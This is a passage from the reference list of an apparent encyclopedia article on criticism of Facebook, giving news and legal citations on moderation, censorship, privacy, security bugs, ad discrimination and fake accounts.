  335. Dolmetsch, Chris (July 31, 2019). "Facebook Isn't Responsible as Terrorist Platform, Court Says". Bloomberg. Retrieved August 7, 2019.
  336. "Facebook Defeats Appeal Claiming It Aided Hamas Attacks". Law360. July 31, 2019. Retrieved August 6, 2019.
  337. "Hezbollah created Palestinian terror cells on Facebook, Israel says after bust". JTA. August 16, 2016. Retrieved August 17, 2016.
  338. Zitun, Yoav (August 16, 2016). "Shin Bet catches Hezbollah recruitment cell in the West Bank". Ynet News. Retrieved August 17, 2016.
  339. Gross, Judah Ari (August 16, 2016). "Hezbollah terror cells, set up via Facebook in West Bank and Israel, busted by Shin Bet". The Times of Israel. Retrieved August 17, 2016.
  340. "Knesset approves Facebook bill in preliminary vote". July 20, 2016. Retrieved July 24, 2016.
  341. Lecher, Colin (June 15, 2017). "Facebook says it wants 'to be a hostile place for terrorists'". The Verge. Vox Media. Retrieved June 16, 2017.
  342. "Facebook using artificial intelligence to fight terrorism". CBS News. CBS. June 15, 2017. Retrieved June 16, 2017.
  343. Solon, Olivia (June 16, 2017). "Revealed: Facebook exposed identities of moderators to suspected terrorists". The Guardian. Guardian Media Group. Retrieved June 18, 2017.
  344. Wong, Joon Ian (June 16, 2017). "The workers who police terrorist content on Facebook were exposed to terrorists by Facebook". Quartz. Atlantic Media. Retrieved June 18, 2017.
  345. "Facebook Deletes Iran-Linked Accounts Followed By 1 Million In U.S., Britain". RFE/RL. Retrieved December 15, 2018.
  346. Shahani, Aarti (November 17, 2016). "From Hate Speech To Fake News: The Content Crisis Facing Mark Zuckerberg". NPR.
  347. Burke, Samuel (November 19, 2016). "Zuckerberg: Facebook will develop tools to fight fake news". CNN Money. Retrieved November 22, 2016.
  348. Shahani, Aarti. Zuckerberg Denies Fake News on Facebook had Impact on the Election. Washington: NPR, 2016. ProQuest.
  349. Kravets, David. Facebook, Google Seek to Gut Fake News Sites’ Money Stream. New York: Condé Nast Publications, Inc., 2016. ProQuest. Web. December 5, 2016.
  350. Kravets, David. Facebook, Google Seek to Gut Fake News Sites’ Money Stream. New York: Condé Nast Publications, Inc., 2016. ProQuest. Web. December 6, 2016.
  351. Newitz, Annalee. Facebook Fires Human Editors, Algorithm Immediately Posts Fake News. New York: Condé Nast Publications, Inc., 2016. ProQuest. Web. December 6, 2016.
  352. Safi, Michael (March 14, 2018). "Sri Lanka accuses Facebook over hate speech after deadly riots". The Guardian.
  353. Taub, Amanda; Fisher, Max. "Where Countries Are Tinderboxes and Facebook Is a Match". The New York Times. Retrieved November 28, 2018.
  354. Stecklow, Steve. "Why Facebook is losing the war on hate speech in Myanmar". Reuters. Retrieved December 15, 2018.
  355. "Facebook bans Myanmar military accounts for 'enabling human rights abuses'". Social.techcrunch.com. Retrieved December 15, 2018.
  356. "Some in Myanmar Fear Fallout From Facebook Removal of Military Pages". Radio Free Asia. Retrieved December 15, 2018.
  357. "Facebook Removes More Pages And Groups Linked to Myanmar Military". Radio Free Asia. Retrieved January 30, 2019.
  358. "'Person of eminence' tag on FB for convict Ajay Chautala". December 17, 2018.
  359. Beckett, Lois (March 27, 2019). "Facebook to ban white nationalism and separatism content". the Guardian. Retrieved March 28, 2019.
  360. Dearden, Lizzie (March 24, 2019). "Neo-Nazi groups allowed to stay on Facebook because they 'do not violate community standards'". The Independent. Retrieved March 28, 2019.
  361. Copley, Caroline (March 4, 2016). "German court rules Facebook may block pseudonyms". Reuters. Thomson Reuters. Retrieved June 3, 2017.
  362. Ortutay, Barbara (May 25, 2009). "Real users caught in Facebook fake-name purge". San Francisco Chronicle. Hearst Communications. Retrieved June 3, 2017.
  363. Levy, Karyne (October 1, 2014). "Facebook Apologizes For 'Real Name' Policy That Forced Drag Queens To Change Their Profiles". Business Insider. Axel Springer SE. Retrieved March 23, 2017.
  364. Crook, Jordan (October 1, 2014). "Facebook Apologizes To LGBT Community And Promises Changes To Real Name Policy". TechCrunch. AOL. Retrieved June 3, 2017.
  365. Osofsky, Jason; Gage, Todd (December 15, 2015). "Community Support FYI: Improving the Names Process on Facebook". Facebook Newsroom. Facebook. Retrieved December 16, 2015.
  366. AFP (December 16, 2015). "Facebook modifies 'real names' policy, testing use of assumed names". CTV News. Bell Media. Retrieved December 16, 2015.
  367. Holpuch, Amanda (December 15, 2015). "Facebook adjusts controversial 'real name' policy in wake of criticism". The Guardian. Guardian Media Group. Retrieved March 23, 2017.
  368. Halliday, Josh (July 6, 2013). "Facebook apologises for deleting free speech group's post on Syrian torture". Guardian.co.uk. London. Retrieved June 4, 2013.
  369. "Jealous Wives Are Getting Courtney Stodden Banned on Facebook - Softpedia". News.softpedia.com. October 14, 2011. Retrieved July 31, 2012.
  370. "When good lulz go bad: unpicking the ugly business of online harassment". Wired.co.uk. January 27, 2014. Retrieved August 23, 2017.
  371. "Niet compatibele browser". Facebook. Archived from the original on June 13, 2010. Retrieved August 7, 2010.
  372. "Caroline McCarthy, "Facebook outage draws more security questions", CNET News.com, ZDNet Asia, August 2, 2007". Zdnetasia.com. August 2, 2007. Archived from the original on May 31, 2008. Retrieved March 23, 2010.
  373. "David Hamilton, "Facebook Outage Hits Some Countries", Web Host Industry Review, Jun. 26, 2008". Thewhir.com. Archived from the original on April 2, 2010. Retrieved March 23, 2010.
  374. "K.C. Jones, "Facebook, MySpace More Reliable Than Peers", Information Week, February 19, 2009". Informationweek.com. Retrieved March 23, 2010.
  375. "Facebook Outage and Facebook Down September 18 2009". Archived from the original on August 9, 2010. Retrieved August 30, 2010.
  376. McCarthy, Caroline (October 8, 2009). "Facebook's mounting customer service crisis | The Social - CNET News". News.cnet.com. Retrieved December 13, 2009.
  377. McCarthy, Caroline (October 10, 2009). "Downed Facebook accounts still haven't returned | The Social - CNET News". News.cnet.com. Retrieved December 13, 2009.
  378. "Facebook Outage Silences 150,000 Users". PC World. October 13, 2009. Retrieved December 13, 2009.
  379. Gaudin, Sharon (October 13, 2009). "Facebook deals with missing accounts, 150,000 angry users". Computerworld.com. Retrieved December 13, 2009.
  380. Reisinger, Don (May 18, 2012). "Facebook sued for $15 billion over alleged privacy infractions". News.cnet.com. Retrieved February 23, 2014.
  381. "After privacy ruling, Facebook now requires Belgium users to log in to view pages". The Verge. Retrieved December 17, 2015.
  382. Gordon, Whitson. "Facebook Changed Everyone's Email to @Facebook.com; Here's How to Fix Yours". Lifehacker.com. Retrieved October 25, 2016.
  383. Johnston, Casey (July 2, 2012). "@facebook.com e-mail plague chokes phone address books". Ars Technica. Condé Nast. Retrieved June 14, 2017.
  384. Hamburger, Ellis (February 24, 2014). "Facebook retires its troubled @facebook.com email service". Theverge.com. Retrieved October 25, 2016.
  385. "Facebook mistakenly asked people if they were in Pakistan following a deadly explosion". Tech Insider. Retrieved March 27, 2016.
  386. "Facebook's Safety Check malfunctions after Pakistan bombing". CNET. Retrieved March 27, 2016.
  387. Arrington, Michael (November 22, 2007). "Is Facebook Really Censoring Search When It Suits Them?". TechCrunch.
  388. Bowles, Nellie; Thielman, Sam (May 9, 2016). "Facebook accused of censoring conservatives, report says". The Guardian. Retrieved May 25, 2016.
    Nunez, Michael (May 9, 2016). "Former Facebook Workers: We Routinely Suppressed Conservative News". Gizmodo.com. Retrieved September 8, 2018.
  389. Hunt, Elle (May 24, 2016). "Facebook to change trending topics after investigation into bias claims". the Guardian. Retrieved May 25, 2016.
  390. "Facebook apologises for blocking Prager University's videos". BBC. August 20, 2018. Retrieved August 22, 2018.
  391. Zhou, Marrian (August 21, 2018). "Facebook apologizes for removing conservative PragerU videos". CNET. Retrieved August 22, 2018.
  392. Schwartz, Jason (March 29, 2018). "Conservative outlets take on Facebook". Politico. Retrieved September 8, 2018.
  393. Flood, Brian (September 5, 2018). "Conservatives ditching Facebook over trust issues and fears of political bias, study shows". Fox News. Retrieved September 8, 2018.
  394. "Congressman Matt Gaetz Files Criminal Referral Against Facebook CEO Mark Zuckerberg". Congressman Matt Gaetz. July 27, 2020. Retrieved July 28, 2020.
  395. "Matt Gaetz Files Criminal Referral Against Facebook CEO Mark Zuckerberg, Urges William Barr To Investigate". Florida Daily. Retrieved July 28, 2020.
  396. Dube Dwilson, Stephanie (October 13, 2018). "Yes, Facebook Is Blocking Minds Links as 'Unsecure'". Heavy.com. Retrieved October 21, 2018.
  397. Klint, Finley (November 11, 2015). "Facebook is blocking an upstart rival - but it's complicated". Wired.com. Retrieved October 21, 2018.
  398. Kelly, Makena (March 11, 2019). "Facebook proves Elizabeth Warren's point by deleting her ads about breaking up Facebook". The Verge. Retrieved February 25, 2020.
  399. Yaron, Oded (August 23, 2016). "Is Facebook Censoring Posts Critical of the Social Media Giant?". Haaretz. Retrieved February 25, 2020.
  400. Beckett, Lois (March 27, 2019). "Facebook to ban white nationalism and separatism content". The Guardian. Retrieved February 25, 2020.
  401. Hern, Alex (February 26, 2019). "Facebook moderators tell of strict scrutiny and PTSD symptoms". The Guardian. Retrieved February 25, 2020.
  402. Hern, Alex (December 4, 2019). "Ex-Facebook worker claims disturbing content led to PTSD". The Guardian. Retrieved February 25, 2020.
  403. "Facebook Censored Breastfeeding. Sadly, I Wasn't Surprised". HuffPost. August 17, 2015. Retrieved May 8, 2020.
  404. Tijou, Sarah (March 20, 2017). "Naked mannequin photographer banned from Facebook". BBC Newsbeat. Retrieved May 8, 2020.
  405. Marcos, Ana (March 16, 2013). "Estas son las imágenes que Facebook no quiso que vieras" [These are the images Facebook did not want you to see]. El País (in Spanish). Retrieved March 17, 2015.
  406. Hansen, Espen Egil (September 9, 2016). "Dear Mark. I am writing this to inform you that I shall not comply with your requirement to remove this picture". Aftenposten.
  407. Nordby, Kristin Jonassen (September 9, 2016). "Norway's prime minister and several government members censored by Facebook". Aftenposten.
  408. Kafka, Peter (September 9, 2016). "Facebook changes its mind, and says it's okay to publish an iconic war photo, after all". Recode.net. Retrieved October 25, 2016.
  409. "Protests mount over Facebook ban on breast-feeding photos; bigger turnout online than in Palo Alto". Mercury News. December 27, 2008.
  410. McGinty, Bill (December 30, 2011). "Facebook apologizes for removing breastfeeding photo". WCNC.COM. Archived from the original on April 10, 2012. Retrieved February 17, 2012.
  411. McGinty, Bill (February 16, 2012). "Photos on breastfeeding Facebook page removed again". WCNC.COM. Archived from the original on April 10, 2012. Retrieved February 17, 2012.
  412. "組員逾八萬 疑有人眼寃不斷施壓 facebook鏟走反民建聯群組" [Group tops 80,000 members; Facebook removes anti-DAB group amid suspected sustained pressure]. Apple Daily (蘋果日報) (in Chinese). February 5, 2010. Hk.apple.nextmedia.com. Retrieved February 23, 2014.
  413. "Ответил за Пушкина". Livejournal.com. July 6, 2015. Archived from the original on July 8, 2015.
  414. "Журналист объяснил публикацию слова "хохол" в Facebook экспериментом". Lenta.Ru. July 7, 2015.
  415. "Колумнист Кононенко объяснил пост со словом "хохол" в Facebook желанием поэкспериментировать". Govoritmoskva.ru. July 7, 2015.
  416. "Кононенко заявил о блокировке аккаунта в Facebook за отрывок из Пушкина". RBC.ru. July 6, 2015.
  417. "Photoshopped celebrities used for Kashmir pellet gun campaign". BBC News. July 28, 2016.
  418. Doshi, Vidhi (July 19, 2016). "Facebook under fire for 'censoring' Kashmir-related posts and accounts". The Guardian.
  419. Lakshmi, Rama (July 27, 2016). "Facebook is censoring some posts on Indian Kashmir". The Washington Post.
  420. "Who removes Kashmir posts on Facebook?". Daily Dawn. July 28, 2016.
  421. Adamczyk, Ed (July 29, 2016). "Kashmir activist campaign shows Facebook CEO Zuckerberg shot in face". United Press International.
  422. "Facebook's Kurdish problem?". Al Jazeera. August 24, 2013. Retrieved June 18, 2017.
  423. Livesay, Christopher (October 7, 2015). "After battling ISIS, Kurds find new foe in Facebook". Public Radio International. WGBH Educational Foundation. Retrieved June 18, 2017.
  424. "Facebook censored 54 posts for 'blasphemy' in Pakistan in second half of 2014 - The Express Tribune". The Express Tribune. Retrieved March 1, 2016.
  425. Faiola, Anthony (January 6, 2016). "Germany springs to action over hate speech against migrants". The Washington Post. Retrieved June 4, 2017.
  426. Bender, Rush; Schechner, Sam (September 14, 2015). "Facebook Outlines Measures to Combat Racist and Xenophobic Content". The Wall Street Journal. Dow Jones & Company. Retrieved June 4, 2017.
  427. Toor, Amar (September 15, 2015). "Facebook will work with Germany to combat anti-refugee hate speech". The Verge. Vox Media. Retrieved June 4, 2017.
  428. Toor, Amar (May 31, 2016). "Facebook, Twitter, Google, and Microsoft agree to EU hate speech rules". The Verge. Vox Media. Retrieved June 4, 2017.
  429. Hern, Alex (May 31, 2016). "Facebook, YouTube, Twitter and Microsoft sign EU hate speech code". The Guardian. Guardian Media Group. Retrieved June 4, 2017.
  430. Dillet, Romain (May 31, 2016). "Facebook, Twitter, YouTube and Microsoft agree to remove hate speech across the EU". TechCrunch. AOL. Retrieved June 4, 2017.
  431. Fioretti, Julia (May 23, 2017). "EU states approve plans to make social media firms tackle hate speech". Reuters. Thomson Reuters. Retrieved June 4, 2017.
  432. Toor, Amar (May 24, 2017). "EU close to making Facebook, YouTube, and Twitter block hate speech videos". The Verge. Vox Media. Retrieved June 4, 2017.
  433. Toor, Amar (June 2, 2017). "Facebook earns EU praise for combatting hate speech, as Twitter and YouTube lag behind". The Verge. Vox Media. Retrieved June 4, 2017.
  434. Macdonald, Alastair; Fioretti, Julia (June 1, 2017). "Social media firms have increased removals of online hate speech: EU". Reuters. Thomson Reuters. Retrieved June 4, 2017.
  435. Yacoub Oweis, Khaled (November 23, 2007). "Syria blocks Facebook in Internet crackdown". Reuters. Retrieved March 5, 2008.
  436. "China's Facebook Status: Blocked". ABC News. July 8, 2009. Archived from the original on July 11, 2009. Retrieved July 13, 2009.
  437. "Facebook Faces Censorship in Iran". American Islamic Congress. August 29, 2007. Archived from the original on April 24, 2008. Retrieved April 30, 2008.
  438. ODPS (2010). "Isle of Man ODPS issues Facebook Guidance booklet" (PDF). Office of the Data Protection Supervisor. Archived from the original (PDF) on November 2, 2012. Retrieved May 1, 2013.
  439. "Pakistan court orders Facebook ban". Belfasttelegraph.co.uk.
  440. Crilly, Rob (May 19, 2010). "Facebook blocked in Pakistan over Prophet Mohammed cartoon row". The Daily Telegraph. London.
  441. "Pakistan blocks YouTube, Facebook over 'sacrilegious content' - CNN.com". May 21, 2010.
  442. "Pakistan blocks YouTube over blasphemous material". GEO.tv. May 20, 2010. Retrieved August 7, 2010.
  443. "Home - Pakistan Telecommunication Authority". Pta.gov.pk. Retrieved August 7, 2010.
  444. "LHC moved for ban on Facebook". Thenews.com.pk. Retrieved December 16, 2018.
  445. "Permanently banning Facebook: Court seeks record of previous petitions". The Express Tribune. May 6, 2011. Retrieved December 16, 2018.
  446. "Organizations blocking Facebook". CTV news.
  447. Benzie, Robert (May 3, 2007). "Facebook banned for Ontario staffers". The Toronto Star. Retrieved March 5, 2008.
  448. "Ontario politicians close the book on Facebook". Blog Campaigning. May 23, 2007. Archived from the original on March 14, 2008. Retrieved March 5, 2008.
  449. "Facebook banned for council staff". BBC News. September 1, 2009. Retrieved February 2, 2010.
  450. "Tietoturvauhan poistuminen voi avata naamakirjan Kokkolassa (In Finnish)". Archived from the original on February 22, 2012. Retrieved February 2, 2010.
  451. "Immediate Ban of Internet Social Networking Sites (SNS) On Marine Corps Enterprise Network (MCEN) NIPRNET". Archived from the original on December 25, 2009. Retrieved February 2, 2010.
  452. "Facebook kiellettiin Keski-Suomen sairaanhoitopiirissä (In Finnish)". Archived from the original on October 25, 2009. Retrieved February 2, 2010.
  453. "Sairaanhoitopiirin työntekijöille kielto nettiyhteisöihin (In Finnish)". Archived from the original on July 20, 2011. Retrieved February 2, 2010.
  454. Fort, Caleb (October 12, 2005). "CIRT blocks access to Facebook.com". Daily Lobo (University of New Mexico). Retrieved April 3, 2006.
  455. "Popular web site, Facebook.com, back online at UNM". University of New Mexico. January 19, 2006. Archived from the original on February 12, 2007. Retrieved April 15, 2007.
  456. Loew, Ryan (June 22, 2006). "Kent banning athlete Web profiles". The Columbus Dispatch. Retrieved October 6, 2006.
  457. "Closed Social Networks as a Gilded Cage". August 6, 2007. Archived from the original on October 29, 2013. Retrieved February 23, 2009.
  458. NSTeens video about private social networking. Archived March 10, 2010, at the Wayback Machine.
  459. Lapeira (October 16, 2008). "Three types of social networking" (blog post).
  460. "Openbook - Connect and share whether you want to or not". Youropenbook.org. May 12, 2010. Archived from the original on August 3, 2010. Retrieved August 7, 2010.
  461. "Niet compatibele browser". Facebook. Retrieved August 7, 2010.
  462. "Facebook Privacy Change Sparks Federal Complaint". PC World. Retrieved March 5, 2009.
  463. "Facebook's New Terms Of Service: "We Can Do Anything We Want With Your Content. Forever."". Consumerist. Consumer Media LLC. Archived from the original on October 8, 2009. Retrieved February 20, 2009.
  464. "Improving Your Ability to Share and Connect". Facebook. Retrieved March 5, 2009.
  465. Haugen, Austin (October 23, 2009). "facebook DEVELOPERS". Facebook. Archived from the original on December 23, 2009. Retrieved October 25, 2009.
  466. "Facebook Town Hall: Proposed Facebook Principles". Facebook. Archived from the original on February 27, 2009. Retrieved March 5, 2009.
  467. "Facebook Town Hall: Proposed Statement of Rights and Responsibilities". Facebook. Archived from the original on February 27, 2009. Retrieved March 5, 2009.
  468. "Governing the Facebook Service in an Open and Transparent Way". Facebook. Retrieved March 5, 2009.
  469. "Rewriting Facebook's Terms of Service". PC World. Retrieved March 5, 2009.
  470. "Democracy Theatre on Facebook". University of Cambridge. Retrieved April 4, 2009.
  471. "Facebook's theatrical rights and wrongs". Open Rights Group. Archived from the original on April 6, 2009. Retrieved April 4, 2009.
  472. "Complaint, Request for Investigation, Injunction, and Other Relief" (PDF). Epic.org. Retrieved December 16, 2018.
  473. "Supplemental Materials in Support of Pending Complaint and Request for Injunction, Request for Investigation and for Other Relief" (PDF). Epic.org. Retrieved December 16, 2018.
  474. Puzzanghera, Jim (March 1, 2011). "Facebook reconsiders allowing third-party applications to ask minors for private information". Los Angeles Times.
  475. Center, Electronic Privacy Information. "EPIC - Facebook Resumes Plan to Disclose User Home Addresses and Mobile Phone Numbers". epic.org.
  476. Baker, Gavin (May 27, 2008). "Free software vs. software-as-a-service: Is the GPL too weak for the Web?". Free Software Magazine. Archived from the original on May 17, 2013. Retrieved June 29, 2009.
  477. "Statement of Rights and Responsibilities". Facebook. May 1, 2009. Retrieved June 29, 2009.
  478. Calore, Michael (December 1, 2008). "As Facebook Connect Expands, OpenID's Challenges Grow". Wired. Retrieved June 29, 2009. Facebook Connect was developed independently using proprietary code, so Facebook's system and OpenID are not interoperable. ... This is a clear threat to the vision of the Open Web, a future when data is freely shared between social websites using open source technologies.
  479. Thompson, Nicholas. "What Facebook Can Sell". The New Yorker. Retrieved May 18, 2014.
  480. Barnett, Emma (May 23, 2012). "Facebook Settles Lawsuit With Angry Users". The Telegraph. London. Retrieved May 18, 2014.
  481. Dijck 2013, p. 47.
  482. Farber, Dan. "Facebook Beacon Update: No Activities Published Without Users Proactively Consenting". ZDNet. Retrieved May 18, 2014.
  483. Sinker, Daniel (February 17, 2009). "Face/Off: How a Little Change in Facebook's User Policy is Making People Rethink the Rights They Give Away Online". Huffingtonpost. Retrieved May 28, 2014.
  484. Dijck 2013, p. 48.
  485. Brunton, Finn. "Vernacular Resistance to Data Collection and Analysis: A Political Theory of Obfuscation". First Monday. Retrieved May 18, 2014.
  486. "BBB Review of Facebook". Retrieved December 12, 2010.
  487. "TrustLink Review of Facebook". Archived from the original on June 13, 2010. Retrieved May 5, 2010.
  488. Emery, Daniel (July 29, 2010). "BBC News - Details of 100m Facebook users collected and published". Bbc.co.uk. Retrieved August 7, 2010.
  489. Nicole Perlroth (June 3, 2013). "Bits: Malware That Drains Your Bank Account Thriving on Facebook". The New York Times. Retrieved June 9, 2013.
  490. Bort, Julie (April 20, 2011). "Researcher: Facebook Ignored the Bug I Found Until I Used It to Hack Zuckerberg - Yahoo! Finance". Finance.yahoo.com. Retrieved August 19, 2013.
  491. "Zuckerberg's Facebook page hacked to prove security exploit". CNN.com. May 14, 2013. Retrieved August 19, 2013.
  492. Tom Warren (August 1, 2013). "Facebook ignored security bug, researcher used it to post details on Zuckerberg's wall". The Verge. Retrieved August 19, 2013.
  493. "Hacker who exposed Facebook bug to get reward from unexpected source - Yahoo! Finance". Finance.yahoo.com. Reuters. August 20, 2013. Archived from the original on August 21, 2013. Retrieved August 22, 2013.
  494. Rogoway, Mike (January 21, 2010). "Facebook picks Prineville for its first data center". OregonLive.com. Retrieved January 21, 2010.
  495. Kaufman, Leslie (September 17, 2010). "You're 'So Coal': Angling to Shame Facebook". The New York Times.
  496. Albanesius, Chloe (September 17, 2010). "Greenpeace Attacks Facebook on Coal-Powered Data Center". PC Magazine.
  497. "Facebook update: Switch to renewable energy now Greening Facebook from within". Greenpeace. February 17, 2010.
  498. Tonelli, Carla (September 1, 2010). "'Friendly' push for Facebook to dump coal". Reuters. Archived from the original on October 13, 2010. Retrieved February 23, 2014.
  499. "Dirty Data Report Card" (PDF). Greenpeace. Retrieved August 22, 2013.
  500. "Facebook and Greenpeace settle Clean Energy Feud". Techcrunch. Retrieved August 22, 2013.
  501. "Facebook Commits to Clean Energy Future". Greenpeace.org. Greenpeace. Retrieved August 22, 2013.
  502. "Startup Claims 80% Of Its Facebook Ad Clicks Are Coming From Bots". TechCrunch.com. January 4, 2011. Retrieved July 31, 2012.
  503. Rodriguez, Salvador (July 30, 2012). "Start-up says 80% of its Facebook ad clicks came from bots". Latimes.com. Retrieved July 31, 2012.
  504. Sengupta, Somini (April 23, 2012). "Bots Raise Their Heads Again on Facebook - NYTimes.com". Bits.blogs.nytimes.com. Retrieved July 31, 2012.
  505. Hof, Robert. "Stung By Click Fraud Allegations, Facebook Reveals How It's Fighting Back". Forbes. Retrieved December 16, 2018.
  506. "Guide to the Ads Create Tool". Facebook. Retrieved June 11, 2014.
  507. "Facebook Advertisers Complain Of A Wave Of Fake Likes Rendering Their Pages Useless". Business Insider. February 11, 2014. Retrieved June 11, 2014.
  508. Kirtiş, A. Kazım; Karahan, Filiz (October 5, 2011). "Efficient Marketing Strategy". Procedia - Social and Behavioral Sciences. 24: 260–268. doi:10.1016/j.sbspro.2011.09.083.
  509. "Are 40% Of Life Science Company Facebook Page 'Likes' From Fake Users?". Comprendia. Retrieved June 7, 2014.
  510. "Facebook, Inc. Form 10K". United States Securities and Exchange Commission. January 28, 2014. Retrieved June 7, 2014.
  511. "What Do Facebook "likes" of Companies Mean?". PubChase. January 23, 2014. Archived from the original on July 3, 2014. Retrieved June 7, 2014.
  512. "Facebook Fraud". YouTube. February 10, 2014. Retrieved June 11, 2014.
  513. "Firms withdraw BNP Facebook ads". BBC News. August 3, 2007. Retrieved April 30, 2010.
  514. "Facebook halts ads that exclude racial and ethnic groups". USA Today. Retrieved March 29, 2019.
  515. Brandom, Russell (March 28, 2019). "Facebook has been charged with housing discrimination by the US government". The Verge. Retrieved March 29, 2019.
  516. Julia Angwin, Ariana Tobin (November 21, 2017). "Facebook (Still) Letting Housing Advertisers Exclude Users by Race". ProPublica. Retrieved March 29, 2019.
  517. Robertson, Adi (April 4, 2019). "Facebook's ad delivery could be inherently discriminatory, researchers say". The Verge. Retrieved April 8, 2019.
  518. Julia Angwin, Terry Parris Jr (October 28, 2016). "Facebook Lets Advertisers Exclude Users by Race". ProPublica. Retrieved March 29, 2019.
  519. "Improving Enforcement and Promoting Diversity: Updates to Ads Policies and Tools". Facebook. Retrieved March 29, 2019.
  520. Statt, Nick (July 24, 2018). "Facebook signs agreement saying it won't let housing advertisers exclude users by race". The Verge. Retrieved March 29, 2019.
  521. Statt, Nick (August 21, 2018). "Facebook will remove 5,000 ad targeting categories to prevent discrimination". The Verge. Retrieved March 29, 2019.
  522. "Facebook agrees to overhaul targeted advertising system for job, housing and loan ads after discrimination complaints". Washington Post. March 19, 2019. Retrieved March 29, 2019.
  523. Madrigal, Alexis C. (March 20, 2019). "Facebook Does Have to Respect Civil-Rights Legislation, After All". The Atlantic. Retrieved March 29, 2019.
  524. Yurieff, Kaya. "HUD charges Facebook with housing discrimination in ads". CNN. Retrieved March 29, 2019.
  525. "Facebook: About 83 million accounts are fake". USA Today. August 3, 2012. Retrieved August 4, 2012.
  526. "Unreal: Facebook reveals 83 million fake profiles". Sydney Morning Herald. Retrieved August 4, 2012.
  527. Rushe, Dominic (August 2, 2012). "Facebook share price slumps below $20 amid fake account flap". The Guardian. London. Retrieved August 4, 2012.
  528. Gupta, Aditi (2017). Towards detecting fake user accounts in facebook. Asia Security and Privacy (ISEASP). pp. 1–6. doi:10.1109/ISEASP.2017.7976996. ISBN 978-1-5090-5942-3.
  529. "Facebook Takes 4 Years to Remove A Woman's Butthole as a Business Page".
  530. "The Facebook Blog - Moving to the new Facebook".
  531. "Facebook Newsroom". newsroom.fb.com.
  532. "Petition against Facebook redesign fails as old version disabled". Archived from the original on September 12, 2012.
  533. "Facebook's New Privacy Changes: The Good, The Bad, and The Ugly | Electronic Frontier Foundation". Eff.org. December 9, 2009. Retrieved August 7, 2010.
  534. "Gawker.com". Gawker.com. December 13, 2009. Archived from the original on May 17, 2013. Retrieved June 11, 2013.
  535. "What Does Facebook's Privacy Transition Mean for You? | ACLUNC dotRights". Dotrights.org. December 4, 2009. Archived from the original on December 12, 2009. Retrieved December 13, 2009.
  536. "Facebook faces criticism on privacy change". BBC News. December 10, 2008. Retrieved December 13, 2009.
  537. "ACLU.org". Secure.aclu.org. Archived from the original on February 24, 2012. Retrieved June 11, 2013.
  538. "Facebook CEO's Private Photos Exposed by the New 'Open' Facebook". Gawker.com. Archived from the original on December 14, 2009. Retrieved December 13, 2009.
  539. McCarthy, Caroline. "Facebook backtracks on public friend lists | The Social - CNET News". News.cnet.com. Retrieved December 13, 2009.
  540. "Mediactive.com". Mediactive.com. December 12, 2009. Retrieved June 11, 2013.
  541. Oremus, Will. "TheBigMoney.com". TheBigMoney.com. Retrieved June 11, 2013.
  542. "ReadWriteWeb.com". ReadWriteWeb.com. Archived from the original on January 13, 2010. Retrieved June 11, 2013.
  543. Benny Evangelista (January 27, 2010). "SFgate.com". SFgate.com. Retrieved February 23, 2014.
  544. Seetharaman, Deepa (January 11, 2018). "Facebook to Rank News Sources by Quality to Battle Misinformation". The New York Times. Retrieved March 5, 2018.
  545. Mark Zuckerberg, Facebook, January 12, 2018.
  546. Isaac, Mike (January 11, 2018). "Facebook Overhauls News Feed to Focus on What Friends and Family Share". The New York Times. Retrieved March 5, 2018.
  547. Mosseri, Adam (January 11, 2018). "News Feed FYI: Bringing People Closer Together". Facebook newsroom. Retrieved March 5, 2018.
  548. Engel Bromwich, Jonah; Haag, Matthew (January 12, 2018). "Facebook Is Changing. What Does That Mean for Your News Feed?". The New York Times. Retrieved March 5, 2018.
  549. Bell, Emily (January 21, 2018). "Why Facebook's news feed changes are bad news for democracy". The Guardian. Retrieved March 11, 2018.
  550. Dojcinovic, Stevan (November 15, 2017). "Hey, Mark Zuckerberg: My Democracy Isn't Your Laboratory". The New York Times. Retrieved March 11, 2018.
  551. Shields, Mike (February 28, 2018). "Facebook's algorithm has wiped out a once flourishing digital publisher". The New York Times. Retrieved March 12, 2018.
  552. "The top 10 facts about FreeBasics". December 28, 2015. Archived from the original on March 2, 2016.
  553. "Free Basics by Facebook". Internet.org.
  554. "TRAI Releases the 'Prohibition of Discriminatory Tariffs for Data Services Regulations, 2016'" (PDF). TRAI. February 8, 2016. Archived from the original (PDF) on February 8, 2016.
  555. "How India Pierced Facebook's Free Internet Program". Backchannel. February 1, 2016.
  556. "TRAI letter to Facebook" (PDF). Archived from the original (PDF) on February 19, 2016.
  557. "Trai to Seek Specific Replies From Facebook Free Basic Supporters". Press Trust of India. December 31, 2015.
  558. Brühl, Jannis; Tanriverdi, Hakan (2018). "Gut für die Welt, aber nicht für uns" [Good for the world, but not for us]. sueddeutsche.de (in German). ISSN 0174-4917. Retrieved December 10, 2018.
  559. "Tech bosses grilled over claims of 'harmful' power". BBC News. July 30, 2020. Retrieved July 30, 2020.
  560. Fung, Brian. "Congress grilled the CEOs of Amazon, Apple, Facebook and Google. Here are the big takeaways". CNN Business. Retrieved July 30, 2020.

Further reading
